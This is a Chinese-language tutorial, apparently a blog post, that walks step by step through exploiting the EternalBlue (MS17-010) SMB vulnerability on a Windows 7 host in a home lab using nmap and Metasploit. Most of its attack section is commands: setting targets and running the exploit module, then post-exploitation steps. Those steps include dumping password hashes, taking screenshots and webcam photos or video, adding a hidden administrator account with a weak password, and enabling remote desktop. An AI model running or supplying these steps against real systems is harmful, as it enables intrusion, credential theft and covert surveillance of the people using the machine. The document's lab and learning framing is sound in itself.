本示例主要提供学习使用,不得用于违法犯罪

目录

什么是永恒之蓝

漏洞复现:

1、信息收集

2、进入MSF利用永恒之蓝漏洞模块

3、后渗透阶段


什么是永恒之蓝

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers公布一大批网络攻击工具,其中包含“永恒之蓝”工具,
          “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒

“WannaCry"勒索软件主要借鉴了针对微软Windows系统漏洞的“永恒之蓝”(EternalBlue)进行传播扩散,“永恒之蓝”攻击程序利用的是Windows SMB远程提权漏洞,可以攻击开放了445 端口的 Windows 系统并提升至系统权限,潜入电脑对多种文件类型加密,并弹出勒索框,向用户索要赎金(以比特币支付)用于解密

漏洞描述MS17-010:

Microsoft Windows SMB Server远程代码执行漏洞 Microsoft Server Message Block 1.0 (SMBv1)服务器处 理某些请求时,在实现上存在远程代码执行漏洞,成功利用后可使攻击者在目标服务器上执行任意代码。如果攻击失败,会导致拒绝服务,对业务造成一定安全风险。 Microsoft Windows Server 2016、Microsoft Windows Server 2012 R2、Microsoft Windows Server 2012、 Microsoft Windows Server 2008 R2、Microsoft Windows Server 2008、Microsoft Windows RT 8.1等等

漏洞复现:

环境:

kali Linux

Windows7

(同一局域网下,可以ping通)

1、信息收集

使用nmap进行信息收集

发现存活主机:192.168.2.248

对192.168.2.248进行操作系统版本检测:

发现192.168.2.248是Microsoft Windows 7|2008|8.1

并且开放445端口,而永恒之蓝正是利用该端口的smb服务,操作系统溢出漏洞

2、进入MSF利用永恒之蓝漏洞模块

打开MSF:msfconsole

 搜索漏洞,命令为:search ms17-010

exploit/windows/smb/ms17010eternalblue          是永恒之蓝攻击模块

auxiliary/scanner/smb/smbms17010                   是永恒之蓝扫描模块

两者一般配合使用,先扫描是否存在漏洞,在进行攻击

使用auxiliary/scanner/smb/smbms17010模块进行扫描

use auxiliary/scanner/smb/smb_ms17_010

设置目标主机IP

扫描run

出现该情况,说明存在ms17-010漏洞

使用exploit/windows/smb/ms17010eternalblue攻击模块

use exploit/windows/smb/ms17_010_eternalblue

设置攻击目标IP(win7):set rhosts 192.168.2.248

设置攻击者IP(kali):set lhost 192.168.2.166

kali的IP为192.168.2.166

 查看设置选项:show options

 开始攻击:run (exploit)

攻击成功

3、后渗透阶段


sysinfo                   #查看目标主机系统信息
run scraper            #查看目标主机详细信息
hashdump             #导出密码的哈希
ps                          #查看目标主机进程信息
pwd                       #查看目标主机当前目录
screenshot            #截图
webcam_list          #查看目标主机的摄像头
webcam_snap        #拍照
webcam_stream      #打开视频
run getgui -u Client -p 123456                    #创建Client用户,密码为123456
net localgroup administrators Client /add   #将Client加入到win7的本地用户组中,以获得更大的权限
run getgui -e                       #开启远程桌面
rdesktop                             #打开远程桌面

*注意,部分命令在不同视图使用(kali终端,meterpreter,以及获取到靶机的shell命令视图下)

通过meterpreter获取屏幕快照:screenshot

 

查看权限:getuid

进入shell:shell

利用shell拿到的执行权限提权,就可以对靶机Win7进行控制

导出密码的哈希:hashdump

 破解xx的密码

 进行远程登陆:rdesktop

登录成功

以上是永恒之蓝漏洞利用部分演示,实际中可以做的事情很多,网络场景中可以利用的漏洞很多,网络安全的威胁无处不在

永恒之蓝漏洞ms17-010相关推荐

  1. 永恒之蓝漏洞利用(MS17-010)获取shell 及获取靶机屏幕截图

    永恒之蓝漏洞利用(MS17-010) 文章目录 永恒之蓝漏洞利用(MS17-010) 一.永恒之蓝(MS17-010)介绍 二.漏洞利用 1.检测目标主机是否存在MS17-010漏洞 2.使用msf攻 ...

  2. 【重要预警】“永恒之蓝”漏洞又现新木马 组成僵尸网络挖矿虚拟货币

    WannaCry和UIWIX勒索软件在全世界掀起了轩然大波,但是利用"永恒之蓝"漏洞进行攻击的却不止这两个恶意软件.今日,亚信安全中国病毒响应中心发现了利用"永恒之蓝&q ...

  3. 利用永恒之蓝入侵服务器复制文件,永恒之蓝漏洞利用复现(示例代码)

    一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗 ...

  4. kali使用msf 通过ms17_010_eternalblue(永恒之蓝)漏洞攻击win7测试 及乱码问题解决

    两台Vmware虚拟机: Kali Win7 64位: (主机)kali的ip是 192.168.0.119 (靶机)win7的ip是192.168.0.109 使用nmap端口扫描工具,扫描一下目标 ...

  5. linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机 ...

  6. MS17-010永恒之蓝漏洞的简谈与利用

    MS17-010是一个安全类型的补丁. MS17-010更新修复了 Microsoft Windows中的漏洞. 如果攻击者向 Microsoft 服务器消息块 1.0 (SMBv1) 服务器发送经特 ...

  7. MS17-010(永恒之蓝)漏洞复现和分析

    MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...

  8. MSF之ms17-010永恒之蓝漏洞利用

    MSF之ms17-010永恒之蓝漏洞利用 准备 扫描漏洞 漏洞攻击 准备 实验准备环境: 被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙) 攻击机:虚拟机kali ...

  9. 永恒之蓝漏洞复现测试

    永恒之蓝MS17-010漏洞复现及利用 一.什么是永恒之蓝? 永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. SMB(全称是Server Me ...

最新文章

  1. [FZSZOJ 1029] 观察者加强版
  2. Dockerizing a Node.js web app
  3. angular ng-show ng-hide的兼容性问题
  4. Linux:shell脚本命令: /dev/null 21 的理解
  5. 应用内截屏的代码,在Activity中测试可用
  6. 解决Mac Chrome打开HTTPS证书错误问题
  7. 大数据分析的四大趋势有哪些
  8. 排序算法-----冒泡排序和选择排序
  9. Qt使用语言家进行国际化,实现多国语言切换
  10. 章文嵩:开放与高可用是阿里云角力海外市场的关键
  11. 库克将在斯坦福大学2019年毕业典礼上发表演讲:6月16日举行
  12. cidaemon.exe
  13. Papi酱: 左手奶瓶右手尿布× 左手papitube右手娱乐圈√
  14. 拜托,面试别再问我 TCC 分布式事务的原理了…
  15. bzoj4094[Usaco2013 Dec]Optimal Milking最优挤奶
  16. 2021深育杯MISC超详细WP
  17. ROS机器人程序设计学习笔记(Chapter2)
  18. K3 WISE 12.3 中间层在虚拟机中注册
  19. win系统丝滑迁移/系统故障修复
  20. 锘崴科技出席2021隐私计算大会,正式发布参编的《隐私计算白皮书(2021)》

热门文章

  1. 推荐一些不常见的搜索引擎
  2. linux网卡操作命令 ,查看Linux下网卡连接状态(up还是down)?
  3. (Python)正则表达式(二)
  4. Android中使用Post带参数请求的方法
  5. 【NLP】文档集数据处理 gensim corpora.Dictionary 的简单使用
  6. 三阶齐次线性方程求通解_的三阶变系数齐次线性微分方程类型
  7. 1.Makefile文件是什么?
  8. c++ 经典服务器开源项目 Tinywebserver的使用与配置(百度智能云服务器安装ubuntu18.04可用公网ip访问)
  9. vue兼容IE11浏览器空白页等一系列问题之踩坑全过程
  10. Spring Boot (Filter)过滤器的实现以及使用场景